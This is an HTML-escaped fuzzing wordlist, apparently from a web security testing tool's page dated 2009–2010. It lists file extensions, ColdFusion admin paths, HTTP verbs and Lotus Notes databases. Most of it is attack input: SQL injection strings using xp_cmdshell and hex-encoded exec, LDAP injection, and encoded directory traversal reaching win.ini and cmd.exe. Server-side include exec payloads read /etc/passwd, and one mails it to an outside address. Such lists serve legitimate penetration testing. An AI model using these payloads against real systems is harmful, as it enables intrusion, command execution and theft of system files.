.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== (Uncommon Data File Extensions  (Update: 16 March 2009 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
